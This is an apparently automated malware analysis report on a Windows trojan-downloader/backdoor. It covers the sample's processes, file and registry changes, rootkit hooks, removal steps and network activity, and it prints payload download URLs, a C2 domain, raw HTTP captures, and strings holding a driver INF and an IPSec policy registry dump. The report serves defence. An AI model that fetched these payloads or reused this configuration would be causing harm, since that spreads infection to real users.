Trojan-Downloader.Win32.Geral.ssc (Kaspersky), Trojan.Agent.AQSI (B) (Emsisoft), Trojan.Agent.AQSI (AdAware), Backdoor.Win32.Farfli.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0e035b78e94e2e4f1ff3db390148d1cc
SHA1: 00037ae1265de8536a1bbcf680475663aa648b81
SHA256: 8edcc5c35a38e58bf46384bac2e65e32cb11fc2bb047ac4d50ce630ba9d420ae
SSDeep: 768:17ugUsUymtvYGYXQQYKeYkNM rZOgk2pfArfiS3 :1CQULBYG4QQY9YYM EZAE/
Size: 37473 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: WinUpackv030beta, Upackv032BetaPatch, PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 1970-01-01 03:00:00
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
sc.exe:612
sc.exe:1572
sc.exe:1776
OneG2190828.exe:1548
runonce.exe:340
The Trojan injects its code into the following process(es):
%original file name%.exe:1696
cc2178718.exe:744
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
ShimCacheMutex
LDMMOO.
File activity
The process %original file name%.exe:1696 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cc2178718.exe (16 bytes)
%System%\wbem\Logs (4 bytes)
%WinDir%\inf\oem10.inf (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (8 bytes)
%Documents and Settings%\%current user%\Local Settings (8 bytes)
%WinDir%\5717.mp4 (58 bytes)
%WinDir%\Temp\Perflib_Perfdata_7a8.dat (4 bytes)
%Documents and Settings%\All Users (4 bytes)
%WinDir% (192 bytes)
C:\$Directory (12 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5 (4 bytes)
%System%\jsseting.data (16 bytes)
%System% (1920 bytes)
%System%\config\SysEvent.Evt (168 bytes)
%Program Files%\RAV\CCtest.inf (4 bytes)
C:\PROGRAM FILES (96 bytes)
%Program Files%\RAV\CCtest.sys (7 bytes)
%System%\drivers\pcidump.sys (11 bytes)
%System%\config (96 bytes)
%WinDir%\inf\oem10.PNF (18746 bytes)
%System%\drivers (96 bytes)
%Documents and Settings%\%current user% (4 bytes)
%Program Files%\RAV\CCtest.dll (10 bytes)
%WinDir%\setupapi.log (32472 bytes)
%System%\drivers\SET41.tmp (7 bytes)
%Documents and Settings%\%current user%\Cookies (96 bytes)
The Trojan deletes the following file(s):
%WinDir%\5717.mp4 (0 bytes)
%Program Files%\RAV\CCtest.inf (0 bytes)
%Program Files%\RAV\CCtest.dll (0 bytes)
%System%\drivers\SET41.tmp (0 bytes)
%Program Files%\RAV\CCtest.sys (0 bytes)
%System%\drivers\pcidump.sys (0 bytes)
%System%\jsseting.data (0 bytes)
The process OneG2190828.exe:1548 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\Rwmltcy.cc3 (75 bytes)
The process cc2178718.exe:744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ope42.tmp (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2180875.exe (5572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2190828.exe (11028 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ope42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2180875.exe (0 bytes)
Registry activity
The process sc.exe:612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D B4 1A 1A 7A 81 93 86 56 61 73 80 FD 3F 70 C0"
The process sc.exe:1572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 43 C2 7B 8E AF 29 D3 B4 4E 69 B7 F8 AE 40 13"
The process sc.exe:1776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 42 FB 27 21 A0 A2 40 76 B2 96 35 E3 11 92 00"
The process %original file name%.exe:1696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"MatchingDeviceId" = "*cctestdevice"
"InfSection" = "CCTest_DDI"
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}]
"Icon" = "-18"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"InfPath" = "oem10.inf"
"ProviderName" = "Microsoft"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}]
"Class" = "CCTest"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}]
"(Default)" = "Class for CCTest devices"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"Extended Base" = "05 00 00 00 01 00 00 00 02 00 00 00 04 00 00 00"
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"InfSectionExt" = ".NT"
"DriverVersion" = "1.0.0.0"
"DriverDate" = "5-7-2010"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 AE 9A 60 EF 5E 99 54 75 F5 A9 19 8E C2 4F B3"
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"DriverDateData" = "00 80 7A 3C 78 ED CA 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"reg.exe" = "Registry Console Tool"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"
[HKLM\System\CurrentControlSet\Control\Class\{D4A133FE-C9E5-4F11-A812-FED74DA86ED5}\0000]
"DriverDesc" = "CCTest Device"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The process runonce.exe:340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 BD EA 62 6F C9 3F 6C E9 C7 79 83 FE 20 A1 60"
Dropped PE files
MD5 | File path |
---|---|
2c2b4c8ad5022846aa424076a31c961c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\cc2178718.exe |
23de22dc74b2878b72fc1e71f6026d5f | c:\WINDOWS\system32\Rwmltcy.cc3 |
62a291ddfc8d86b4164d195211cf90d9 | c:\WINDOWS\system32\drivers\CCTest.sys |
add4832059173fcdb135d949194ad52b | c:\WINDOWS\system32\jsseting.data |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following kernel-mode hooks:
ZwQuerySystemInformation
Using the driver "%System%\drivers\pcidump.sys" the Trojan substitutes IRP handlers in a file system driver (NTFS) to control operations with files:
MJ_CREATE
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
sc.exe:612
sc.exe:1572
sc.exe:1776
OneG2190828.exe:1548
runonce.exe:340
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\cc2178718.exe (16 bytes)
%System%\wbem\Logs (4 bytes)
%WinDir%\inf\oem10.inf (4 bytes)
%WinDir%\5717.mp4 (58 bytes)
%WinDir%\Temp\Perflib_Perfdata_7a8.dat (4 bytes)
%Documents and Settings%\All Users (4 bytes)
C:\$Directory (12 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5 (4 bytes)
%System%\jsseting.data (16 bytes)
%System%\config\SysEvent.Evt (168 bytes)
%Program Files%\RAV\CCtest.inf (4 bytes)
C:\PROGRAM FILES (96 bytes)
%Program Files%\RAV\CCtest.sys (7 bytes)
%System%\drivers\pcidump.sys (11 bytes)
%WinDir%\inf\oem10.PNF (18746 bytes)
%Program Files%\RAV\CCtest.dll (10 bytes)
%WinDir%\setupapi.log (32472 bytes)
%System%\drivers\SET41.tmp (7 bytes)
%Documents and Settings%\%current user%\Cookies (96 bytes)
%System%\Rwmltcy.cc3 (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ope42.tmp (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2180875.exe (5572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OneG2190828.exe (11028 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.Upack | 4096 | 139264 | 512 | 1.96068 | f92dea8a39a051133c79752ab6289945 |
.rsrc | 143360 | 69632 | 36961 | 5.5417 | 406e6de271cf332038f71d0543efba3a |
Dropped from:
Downloaded by:
0e035b78e94e2e4f1ff3db390148d1cc
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://s-56350.gotocdn.com/templates/6000.exe | |
hxxp://s-56350.gotocdn.com/templates/sc.exe | |
hxxp://www.gaopinhanhsteel.com/templates/sc.exe | 113.10.149.127 |
hxxp://www.gaopinhanhsteel.com/templates/6000.exe | 113.10.149.127 |
mateng1761.f3322.org | 42.51.155.159 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /templates/6000.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.gaopinhanhsteel.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 22 Oct 2014 18:29:30 GMT
Content-Length: 37473
Content-Type: application/octet-stream
Content-Location: hXXp://VVV.gaopinhanhsteel.com/templates/6000.exe
Last-Modified: Wed, 17 Sep 2014 15:03:36 GMT
Accept-Ranges: bytes
ETag: "996a9f8e88d2cf1:21f50"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MZKERNEL32.DLL..LoadLibraryA....GetProcAddress.......ByDwing@...PE..L......................2............0.............@..........................@..............................................9...(....................................................................................................................Upack... ..........................`....rsrc........0..a...................`...d.B......0B...............................@...B...B...B...B...B.|.........@.W.B.Y.B...B.."B.....5.B...B.K.B..............o..O...7j...jG.....m..'nA....77.X.Yj.V......h:..WW.r..(..%..!z1.b...t&...B>.UhB[....b.5.Y[....dC....-.......O..$....{.f....9.s.@..........)".g@9.,T..[.j;|...m..^....1...n?.*..f....e.u$$..h.?..'.Bu..|.*.U.P....~...w.Fr..{!c....3,....O2w..,q...S.s...d. '.V..n.............]"\..F^.h.Z..!.......y..S...`Di..)...j,.K.M.\/b_...R...k.....A..-."^......B'..c-/$...?x.{..p.O.r.7...8..C...`L...S....`CW...............)V0J...e/..H.Eh...}.....v.4.......H...1....B....l._.....$.AT.....#g.t.G..l..{.F}...J(.V^...#.PWk....?.=SX5.Z.g...e.I.....q..I.....k.@'....KCa..K.-=..e..[}.VN..m.0d..7...}.H...p..r...{2{.-"x!.U,...>...Y/.d...9K...}.....3@.....q(....W...xP...J..>}...m.....<..{..%.j."A........T....NN.^...%PI.....|9r.qm..\i..*Q@DG.....7.n. ..S8SvZ\......[H7hz...ljI/.....'../'[.U.'Gs...k............).v..y./...E..._..~..>v..hj...q:......'.Z.O=.`1.=......n.q....M.D.oQ.......j.z.....A.{.XG..x..<>x:....s..C..~.*. ...l?...08.IHZ..N@4o..h ...0.m)..PM....[j^....$..^B. .._....ub.....o.4.....x...@G.....C..0%...y.y......
<<< skipped >>>
GET /templates/sc.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.gaopinhanhsteel.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 22 Oct 2014 18:29:34 GMT
Content-Length: 78848
Content-Type: application/octet-stream
Content-Location: hXXp://VVV.gaopinhanhsteel.com/templates/sc.exe
Last-Modified: Wed, 17 Sep 2014 15:03:10 GMT
Accept-Ranges: bytes
ETag: "535efc7e88d2cf1:21f50"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MZ......................@............................................i.L.i.L.i.L.O.L.i.L.i.L.i.L.f.L.i.L7v.L.i.L.o.L.i.LRich.i.L................PE..L.....yN.....................*............... ....@..........................p..............................................l ..<....`............................................................................... ..l............................text...z........................... ..`.rdata....... ......................@..@.data...H ...0..."..................@....rsrc........`.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................V.t$.W.|$.;.u..._^.... @.P.3.......5...... ..F......_^..............L$..T$..D$..L$..L$.R.T$.QPR.D$.... @.....D$.u.... @...t............D$..T$.....................(...U3.VUj..........tnS.D$.WPV.D$.(....y.....tA..$<...... @..L$4QW....t#.T$.RV.K.....u.V... @._[..^]..(.........V... @._[..^]..(......^]..(.....................`....D$TSUVWh....3.PV..L @.....0....L$dh.....T$hQR..H @...........$h...h....Ph.PA...D @..........L$dh.PA.Q..$t...h.PA.R..d @......$l.....$h...PQ..@ @...< @.3..T$......3..|$$.T$.h...
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1696:
MZKERNEL32.DLL
.Upack
.rsrc
.data
.reloc
Acr@ojcTcrtocpgjViohrctu&`gojcb'
\drivers\gm.dls
\drivers\pcidump.sys
GetWindowsDirectoryA
KERNEL32.dll
ADVAPI32.dll
khy.dll
; File Name: CCTest.inf
; Generated by C DriverWizard 3.2.0 (Build 2485)
Signature="$WINDOWS NT$"
ClassGUID={D4A133FE-C9E5-4F11-A812-FED74DA86ED5}
DriverVer=5/7/2010,1.00.0000
CatalogFile=CCTest.cat
;reg-root,[subkey],[value-entry-name],[flags],[value]
HKR,,,%REG_SZ%,%DeviceClassName%
1 = %DiskId1%,,,""
CCTest.sys = 1,,
%CCTest_DeviceDesc$=CCTest_DDI, *CCTestDevice
; --------- Windows 98 -----------------
; cause problems in Windows 98
HKR,,NTMPDriver,,CCTest.sys
HKR,,Description,,%CCTest_DeviceDesc%
; --------- Windows NT -----------------
[CCTest_DDI.NT]
[CCTest_DDI.NT.Services]
Addservice = CCTest, %FLG_ADDREG_NOCLOBBER%, CCTest_Service
DisplayName = %CCTest_SvcDesc%
ServiceType = %SERVICE_KERNEL_DRIVER%
StartType = %SERVICE_DEMAND_START%
ErrorControl = %SERVICE_ERROR_NORMAL%
ServiceBinary = %\CCTest.sys
CCTest.sys,,,2
FLG_ADDREG_KEYONLY = 0x00000010
FLG_ADDREG_64BITKEY = 0x00001000
FLG_ADDREG_KEYONLY_COMMON = 0x00002000
FLG_ADDREG_32BITKEY = 0x00004000
.text
h.data
B.reloc
D:\5-20\9\CCTest\Driver\objfre\i386\CCTest.pdb
ZwCreateKey
ntoskrnl.exe
HAL.dll
`.CRT
.tls0
.reloc
hXXp://host
hXXp://count
2014-8-1
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
Windows7
Windows2000
WindowsXP
Windows2003
Windows98
WindowsNT
hXXp://downpath
%sOneG%d.exe
SSSSh
YYSSSSh
WinExec
USER32.dll
RegCloseKey
RegCreateKeyA
InternetOpenUrlA
HttpQueryInfoA
DeleteUrlCacheEntry
WININET.dll
MSVCP60.dll
ShellExecuteA
SHELL32.dll
MSVCRT.dll
advapi32.dll
kdll.dll
setupapi.dll
shell32.dll
reg.exe
import
\5717.mp4
jsseting.data
%scc%d.exe
KERNEL32.DLL
GetCPInfo
USER32.DLL
SETUPAPI.DLL
w.Nps
B).pA)
7Vn%c:
83.XW
u%u#@
JNh.VV{
U%UR]
Windows NT\
Image File Execution Options\
svchost.exe
CCTest.sys
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local]
"ActivePolicy"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{72385235-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{72385235-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385235-70fa-11d1-864c-14a300000000}"
00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523a-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{3f91a81a-7647-11d1-864d-d46a00000000}"
"ipsecNegotiationPolicyType"="{62f49e10-6c37-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}]
"name"="ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
"ipsecID"="{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}]
"name"="ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385234-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}]
"name"="ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"ipsecID"="{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}]
"name"="ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecID"="{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecNegotiationPolicyAction"="{3f91a819-7647-11d1-864d-d46a00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385233-70fa-11d1-864c-14a300000000}"
00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{8a171dd2-77e3-11d1-8659-a04f00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}]
"name"="ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecID"="{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecNegotiationPolicyAction"="{8a171dd3-77e3-11d1-8659-a04f00000000}"
"ipsecNegotiationPolicyType"="{62f49e13-6c37-11d1-864c-14a300000000}"
00,00,00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}]
"name"="ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecID"="{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}]
"name"="ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecID"="{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}]
"name"="ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecID"="{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecISAKMPReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
%original file name%.exe_1696_rwx_00401000_00022000:
.data
.reloc
Acr@ojcTcrtocpgjViohrctu&`gojcb'
\drivers\gm.dls
\drivers\pcidump.sys
GetWindowsDirectoryA
KERNEL32.dll
ADVAPI32.dll
khy.dll
; File Name: CCTest.inf
; Generated by C DriverWizard 3.2.0 (Build 2485)
Signature="$WINDOWS NT$"
ClassGUID={D4A133FE-C9E5-4F11-A812-FED74DA86ED5}
DriverVer=5/7/2010,1.00.0000
CatalogFile=CCTest.cat
;reg-root,[subkey],[value-entry-name],[flags],[value]
HKR,,,%REG_SZ%,%DeviceClassName%
1 = %DiskId1%,,,""
CCTest.sys = 1,,
%CCTest_DeviceDesc$=CCTest_DDI, *CCTestDevice
; --------- Windows 98 -----------------
; cause problems in Windows 98
HKR,,NTMPDriver,,CCTest.sys
HKR,,Description,,%CCTest_DeviceDesc%
; --------- Windows NT -----------------
[CCTest_DDI.NT]
[CCTest_DDI.NT.Services]
Addservice = CCTest, %FLG_ADDREG_NOCLOBBER%, CCTest_Service
DisplayName = %CCTest_SvcDesc%
ServiceType = %SERVICE_KERNEL_DRIVER%
StartType = %SERVICE_DEMAND_START%
ErrorControl = %SERVICE_ERROR_NORMAL%
ServiceBinary = %\CCTest.sys
CCTest.sys,,,2
FLG_ADDREG_KEYONLY = 0x00000010
FLG_ADDREG_64BITKEY = 0x00001000
FLG_ADDREG_KEYONLY_COMMON = 0x00002000
FLG_ADDREG_32BITKEY = 0x00004000
.text
h.data
.rsrc
B.reloc
D:\5-20\9\CCTest\Driver\objfre\i386\CCTest.pdb
ZwCreateKey
ntoskrnl.exe
HAL.dll
`.CRT
.tls0
.reloc
hXXp://host
hXXp://count
2014-8-1
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
Windows7
Windows2000
WindowsXP
Windows2003
Windows98
WindowsNT
hXXp://downpath
%sOneG%d.exe
SSSSh
YYSSSSh
WinExec
USER32.dll
RegCloseKey
RegCreateKeyA
InternetOpenUrlA
HttpQueryInfoA
DeleteUrlCacheEntry
WININET.dll
MSVCP60.dll
ShellExecuteA
SHELL32.dll
MSVCRT.dll
advapi32.dll
kdll.dll
setupapi.dll
shell32.dll
reg.exe
import
\5717.mp4
jsseting.data
%scc%d.exe
KERNEL32.DLL
GetCPInfo
USER32.DLL
SETUPAPI.DLL
Windows NT\
Image File Execution Options\
svchost.exe
CCTest.sys
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local]
"ActivePolicy"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{72385235-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{72385235-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385235-70fa-11d1-864c-14a300000000}"
00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523a-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{3f91a81a-7647-11d1-864d-d46a00000000}"
"ipsecNegotiationPolicyType"="{62f49e10-6c37-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}]
"name"="ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
"name"="ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
"ipsecID"="{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
"ipsecID"="{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}]
"name"="ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}"
"name"="ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385234-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385234-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}]
"name"="ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
